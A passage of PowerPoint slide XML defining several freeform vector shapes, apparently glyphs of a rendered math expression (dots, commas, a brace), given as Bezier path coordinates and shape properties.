                <a:gd name="T13" fmla="*/ 8 h 318"/>
                <a:gd name="T14" fmla="*/ 33 w 217"/>
                <a:gd name="T15" fmla="*/ 8 h 318"/>
                <a:gd name="T16" fmla="*/ 17 w 217"/>
                <a:gd name="T17" fmla="*/ 0 h 318"/>
                <a:gd name="T18" fmla="*/ 0 w 217"/>
                <a:gd name="T19" fmla="*/ 20 h 318"/>
                <a:gd name="T20" fmla="*/ 0 w 217"/>
                <a:gd name="T21" fmla="*/ 41 h 318"/>
                <a:gd name="T22" fmla="*/ 17 w 217"/>
                <a:gd name="T23" fmla="*/ 61 h 318"/>
                <a:gd name="T24" fmla="*/ 34 w 217"/>
                <a:gd name="T25" fmla="*/ 38 h 318"/>
                <a:gd name="T26" fmla="*/ 166 w 217"/>
                <a:gd name="T27" fmla="*/ 3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318">
                  <a:moveTo>
                    <a:pt x="166" y="38"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="130"/>
                    <a:pt x="63" y="239"/>
                    <a:pt x="63" y="294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="301"/>
                    <a:pt x="63" y="318"/>
                    <a:pt x="80" y="318"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="89" y="318"/>
                    <a:pt x="97" y="312"/>
                    <a:pt x="97" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="156"/>
                    <a:pt x="176" y="69"/>
                    <a:pt x="206" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="216" y="31"/>
                    <a:pt x="217" y="30"/>
                    <a:pt x="217" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217" y="8"/>
                    <a:pt x="205" y="8"/>
                    <a:pt x="197" y="8"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="33" y="8"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="0"/>
                    <a:pt x="21" y="0"/>
                    <a:pt x="17" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="11"/>
                    <a:pt x="0" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="41"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="50"/>
                    <a:pt x="0" y="61"/>
                    <a:pt x="17" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="61"/>
                    <a:pt x="34" y="52"/>
                    <a:pt x="34" y="38"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="166" y="3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09" name="Freeform 950">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{418DE4F9-7AC7-4F6C-B550-A69568E1DF04}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId126"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3638551" y="2405063"/>
              <a:ext cx="28575" cy="46038"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 51 w 83"/>
                <a:gd name="T1" fmla="*/ 61 h 132"/>
                <a:gd name="T2" fmla="*/ 14 w 83"/>
                <a:gd name="T3" fmla="*/ 102 h 132"/>
                <a:gd name="T4" fmla="*/ 0 w 83"/>
                <a:gd name="T5" fmla="*/ 116 h 132"/>
                <a:gd name="T6" fmla="*/ 16 w 83"/>
                <a:gd name="T7" fmla="*/ 132 h 132"/>
                <a:gd name="T8" fmla="*/ 83 w 83"/>
                <a:gd name="T9" fmla="*/ 50 h 132"/>
                <a:gd name="T10" fmla="*/ 42 w 83"/>
                <a:gd name="T11" fmla="*/ 0 h 132"/>
                <a:gd name="T12" fmla="*/ 10 w 83"/>
                <a:gd name="T13" fmla="*/ 31 h 132"/>
                <a:gd name="T14" fmla="*/ 41 w 83"/>
                <a:gd name="T15" fmla="*/ 62 h 132"/>
                <a:gd name="T16" fmla="*/ 51 w 83"/>
                <a:gd name="T17" fmla="*/ 6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32">
                  <a:moveTo>
                    <a:pt x="51" y="61"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="92"/>
                    <a:pt x="20" y="100"/>
                    <a:pt x="14" y="102"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="103"/>
                    <a:pt x="0" y="106"/>
                    <a:pt x="0" y="116"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="123"/>
                    <a:pt x="8" y="132"/>
                    <a:pt x="16" y="132"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="132"/>
                    <a:pt x="83" y="105"/>
                    <a:pt x="83" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="19"/>
                    <a:pt x="63" y="0"/>
                    <a:pt x="42" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="0"/>
                    <a:pt x="10" y="15"/>
                    <a:pt x="10" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="50"/>
                    <a:pt x="25" y="62"/>
                    <a:pt x="41" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="62"/>
                    <a:pt x="47" y="62"/>
                    <a:pt x="51" y="6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10" name="Freeform 951">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB23240C-0889-41D2-BC7F-FD0E3C0654D5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId127"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3732213" y="2405063"/>
              <a:ext cx="20638" cy="22225"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 62 w 62"/>
                <a:gd name="T1" fmla="*/ 31 h 62"/>
                <a:gd name="T2" fmla="*/ 31 w 62"/>
                <a:gd name="T3" fmla="*/ 0 h 62"/>
                <a:gd name="T4" fmla="*/ 0 w 62"/>
                <a:gd name="T5" fmla="*/ 31 h 62"/>
                <a:gd name="T6" fmla="*/ 31 w 62"/>
                <a:gd name="T7" fmla="*/ 62 h 62"/>
                <a:gd name="T8" fmla="*/ 62 w 62"/>
                <a:gd name="T9" fmla="*/ 31 h 62"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="62" h="62">
                  <a:moveTo>
                    <a:pt x="62" y="31"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="13"/>
                    <a:pt x="47" y="0"/>
                    <a:pt x="31" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="15"/>
                    <a:pt x="0" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="49"/>
                    <a:pt x="15" y="62"/>
                    <a:pt x="31" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="62"/>
                    <a:pt x="62" y="47"/>
                    <a:pt x="62"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11" name="Freeform 952">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FFA8A5C-9BC7-4977-AC0C-52FFC6139C74}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId128"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3822701" y="2405063"/>
              <a:ext cx="20638" cy="22225"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 62 w 62"/>
                <a:gd name="T1" fmla="*/ 31 h 62"/>
                <a:gd name="T2" fmla="*/ 32 w 62"/>
                <a:gd name="T3" fmla="*/ 0 h 62"/>
                <a:gd name="T4" fmla="*/ 0 w 62"/>
                <a:gd name="T5" fmla="*/ 31 h 62"/>
                <a:gd name="T6" fmla="*/ 31 w 62"/>
                <a:gd name="T7" fmla="*/ 62 h 62"/>
                <a:gd name="T8" fmla="*/ 62 w 62"/>
                <a:gd name="T9" fmla="*/ 31 h 62"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="62" h="62">
                  <a:moveTo>
                    <a:pt x="62" y="31"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="13"/>
                    <a:pt x="47" y="0"/>
                    <a:pt x="32" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="0" y="15"/>
                    <a:pt x="0" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="49"/>
                    <a:pt x="15" y="62"/>
                    <a:pt x="31" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="62"/>
                    <a:pt x="62" y="47"/>
                    <a:pt x="62"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12" name="Freeform 953">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF1E32B7-0C63-42E9-A452-7D6DBBFFA9D0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId129"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3913188" y="2405063"/>
              <a:ext cx="20638" cy="22225"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 62 w 62"/>
                <a:gd name="T1" fmla="*/ 31 h 62"/>
                <a:gd name="T2" fmla="*/ 31 w 62"/>
                <a:gd name="T3" fmla="*/ 0 h 62"/>
                <a:gd name="T4" fmla="*/ 0 w 62"/>
                <a:gd name="T5" fmla="*/ 31 h 62"/>
                <a:gd name="T6" fmla="*/ 31 w 62"/>
                <a:gd name="T7" fmla="*/ 62 h 62"/>
                <a:gd name="T8" fmla="*/ 62 w 62"/>
                <a:gd name="T9" fmla="*/ 31 h 62"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="62" h="62">
                  <a:moveTo>
                    <a:pt x="62" y="31"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="13"/>
                    <a:pt x="47" y="0"/>
                    <a:pt x="31" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="15"/>
                    <a:pt x="0" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="49"/>
                    <a:pt x="15" y="62"/>
                    <a:pt x="31" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="62"/>
                    <a:pt x="62" y="47"/>
                    <a:pt x="62"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13" name="Freeform 954">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B6D85D4-07D8-49F3-844D-9E039304EAF0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId130"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3981451" y="2295526"/>
              <a:ext cx="60325" cy="174625"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 72 w 177"/>
                <a:gd name="T1" fmla="*/ 433 h 499"/>
                <a:gd name="T2" fmla="*/ 5 w 177"/>
                <a:gd name="T3" fmla="*/ 488 h 499"/>
                <a:gd name="T4" fmla="*/ 0 w 177"/>
                <a:gd name="T5" fmla="*/ 493 h 499"/>
                <a:gd name="T6" fmla="*/ 10 w 177"/>
                <a:gd name="T7" fmla="*/ 499 h 499"/>
                <a:gd name="T8" fmla="*/ 106 w 177"/>
                <a:gd name="T9" fmla="*/ 437 h 499"/>
                <a:gd name="T10" fmla="*/ 106 w 177"/>
                <a:gd name="T11" fmla="*/ 323 h 499"/>
                <a:gd name="T12" fmla="*/ 126 w 177"/>
                <a:gd name="T13" fmla="*/ 271 h 499"/>
                <a:gd name="T14" fmla="*/ 173 w 177"/>
                <a:gd name="T15" fmla="*/ 255 h 499"/>
                <a:gd name="T16" fmla="*/ 177 w 177"/>
                <a:gd name="T17" fmla="*/ 250 h 499"/>
                <a:gd name="T18" fmla="*/ 170 w 177"/>
                <a:gd name="T19" fmla="*/ 244 h 499"/>
                <a:gd name="T20" fmla="*/ 107 w 177"/>
                <a:gd name="T21" fmla="*/ 200 h 499"/>
                <a:gd name="T22" fmla="*/ 106 w 177"/>
                <a:gd name="T23" fmla="*/ 175 h 499"/>
                <a:gd name="T24" fmla="*/ 106 w 177"/>
                <a:gd name="T25" fmla="*/ 77 h 499"/>
                <a:gd name="T26" fmla="*/ 82 w 177"/>
                <a:gd name="T27" fmla="*/ 21 h 499"/>
                <a:gd name="T28" fmla="*/ 10 w 177"/>
                <a:gd name="T29" fmla="*/ 0 h 499"/>
                <a:gd name="T30" fmla="*/ 0 w 177"/>
                <a:gd name="T31" fmla="*/ 6 h 499"/>
                <a:gd name="T32" fmla="*/ 8 w 177"/>
                <a:gd name="T33" fmla="*/ 11 h 499"/>
                <a:gd name="T34" fmla="*/ 71 w 177"/>
                <a:gd name="T35" fmla="*/ 55 h 499"/>
                <a:gd name="T36" fmla="*/ 72 w 177"/>
                <a:gd name="T37" fmla="*/ 78 h 499"/>
                <a:gd name="T38" fmla="*/ 72 w 177"/>
                <a:gd name="T39" fmla="*/ 183 h 499"/>
                <a:gd name="T40" fmla="*/ 92 w 177"/>
                <a:gd name="T41" fmla="*/ 230 h 499"/>
                <a:gd name="T42" fmla="*/ 131 w 177"/>
                <a:gd name="T43" fmla="*/ 250 h 499"/>
                <a:gd name="T44" fmla="*/ 72 w 177"/>
                <a:gd name="T45" fmla="*/ 313 h 499"/>
                <a:gd name="T46" fmla="*/ 72 w 177"/>
                <a:gd name="T47" fmla="*/ 43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7" h="499">
                  <a:moveTo>
                    <a:pt x="72" y="433"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="452"/>
                    <a:pt x="59" y="484"/>
                    <a:pt x="5" y="488"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="488"/>
                    <a:pt x="0" y="490"/>
                    <a:pt x="0" y="493"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="499"/>
                    <a:pt x="6" y="499"/>
                    <a:pt x="10" y="499"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="499"/>
                    <a:pt x="105" y="474"/>
                    <a:pt x="106" y="437"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="106" y="323"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="303"/>
                    <a:pt x="106" y="287"/>
                    <a:pt x="126" y="271"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="257"/>
                    <a:pt x="162" y="256"/>
                    <a:pt x="173" y="255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="255"/>
                    <a:pt x="177" y="253"/>
                    <a:pt x="177" y="250"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="245"/>
                    <a:pt x="175" y="245"/>
                    <a:pt x="170" y="244"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="137" y="242"/>
                    <a:pt x="113" y="224"/>
                    <a:pt x="107" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="194"/>
                    <a:pt x="106" y="193"/>
                    <a:pt x="106" y="175"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="106" y="77"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="56"/>
                    <a:pt x="106" y="40"/>
                    <a:pt x="82" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="5"/>
                    <a:pt x="27" y="0"/>
                    <a:pt x="10" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="11"/>
                    <a:pt x="3" y="11"/>
                    <a:pt x="8" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="13"/>
                    <a:pt x="64" y="29"/>
                    <a:pt x="71" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="59"/>
                    <a:pt x="72" y="60"/>
                    <a:pt x="72" y="78"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72" y="183"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="206"/>
                    <a:pt x="76" y="214"/>
                    <a:pt x="92" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="241"/>
                    <a:pt x="117" y="246"/>
                    <a:pt x="131" y="250"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="261"/>
                    <a:pt x="72" y="284"/>
                    <a:pt x="72" y="313"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72" y="43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14" name="Freeform 955">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D471A31-5485-4A18-909C-D47D091A7945}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId131"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4086226" y="2405063"/>
              <a:ext cx="28575" cy="46038"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 51 w 83"/>
                <a:gd name="T1" fmla="*/ 61 h 132"/>
                <a:gd name="T2" fmla="*/ 14 w 83"/>
                <a:gd name="T3" fmla="*/ 102 h 132"/>
                <a:gd name="T4" fmla="*/ 0 w 83"/>
                <a:gd name="T5" fmla="*/ 116 h 132"/>
                <a:gd name="T6" fmla="*/ 16 w 83"/>
                <a:gd name="T7" fmla="*/ 132 h 132"/>
                <a:gd name="T8" fmla="*/ 83 w 83"/>
                <a:gd name="T9" fmla="*/ 50 h 132"/>
                <a:gd name="T10" fmla="*/ 42 w 83"/>
                <a:gd name="T11" fmla="*/ 0 h 132"/>
                <a:gd name="T12" fmla="*/ 10 w 83"/>
                <a:gd name="T13" fmla="*/ 31 h 132"/>
                <a:gd name="T14" fmla="*/ 41 w 83"/>
                <a:gd name="T15" fmla="*/ 62 h 132"/>
                <a:gd name="T16" fmla="*/ 51 w 83"/>
                <a:gd name="T17" fmla="*/ 6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32">
                  <a:moveTo>
                    <a:pt x="51" y="61"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="92"/>
                    <a:pt x="20" y="100"/>
                    <a:pt x="14" y="102"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="103"/>
                    <a:pt x="0" y="106"/>
                    <a:pt x="0" y="116"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="123"/>
                    <a:pt x="8" y="132"/>
                    <a:pt x="16" y="132"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="132"/>
                    <a:pt x="83" y="105"/>
                    <a:pt x="83" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="19"/>
                    <a:pt x="64" y="0"/>
                    <a:pt x="42" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="0"/>
                    <a:pt x="10" y="15"/>
                    <a:pt x="10" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="50"/>
                    <a:pt x="25" y="62"/>
                    <a:pt x="41" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="62"/>
                    <a:pt x="48" y="62"/>
                    <a:pt x="51" y="6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15" name="Freeform 956">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E96EE364-F969-4631-A8C8-D676CB2ECAA9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId132"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4179888" y="2405063"/>
              <a:ext cx="20638" cy="22225"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 62 w 62"/>
                <a:gd name="T1" fmla="*/ 31 h 62"/>
                <a:gd name="T2" fmla="*/ 31 w 62"/>
                <a:gd name="T3" fmla="*/ 0 h 62"/>
                <a:gd name="T4" fmla="*/ 0 w 62"/>
                <a:gd name="T5" fmla="*/ 31 h 62"/>
                <a:gd name="T6" fmla="*/ 31 w 62"/>
                <a:gd name="T7" fmla="*/ 62 h 62"/>
                <a:gd name="T8" fmla="*/ 62 w 62"/>
                <a:gd name="T9" fmla="*/ 31 h 62"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="62" h="62">
                  <a:moveTo>
                    <a:pt x="62" y="31"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="13"/>
                    <a:pt x="47" y="0"/>
                    <a:pt x="31" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="15"/>
                    <a:pt x="0" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="49"/>
                    <a:pt x="15" y="62"/>
                    <a:pt x="31" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="62"/>
                    <a:pt x="62" y="47"/>
                    <a:pt x="62"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16" name="Freeform 957">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D14D727-6764-4F8D-A874-6998164DE250}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId133"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4268788" y="2405063"/>
              <a:ext cx="22225" cy="22225"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 63 w 63"/>
                <a:gd name="T1" fmla="*/ 31 h 62"/>
                <a:gd name="T2" fmla="*/ 32 w 63"/>
                <a:gd name="T3" fmla="*/ 0 h 62"/>
                <a:gd name="T4" fmla="*/ 0 w 63"/>
                <a:gd name="T5" fmla="*/ 31 h 62"/>
                <a:gd name="T6" fmla="*/ 31 w 63"/>
                <a:gd name="T7" fmla="*/ 62 h 62"/>
                <a:gd name="T8" fmla="*/ 63 w 63"/>
                <a:gd name="T9" fmla="*/ 31 h 62"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="63" h="62">
                  <a:moveTo>
                    <a:pt x="63" y="31"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="13"/>
                    <a:pt x="48" y="0"/>
                    <a:pt x="32" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="0" y="15"/>
                    <a:pt x="0" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="49"/>
                    <a:pt x="15" y="62"/>
                    <a:pt x="31" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="62"/>
                    <a:pt x="63" y="47"/>
                    <a:pt x="63"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17" name="Freeform 958">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FD556E3-E023-4804-BA09-76265BFB4F09}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId134"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4359276" y="2405063"/>
              <a:ext cx="22225" cy="22225"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 62 w 62"/>
                <a:gd name="T1" fmla="*/ 31 h 62"/>
                <a:gd name="T2" fmla="*/ 31 w 62"/>
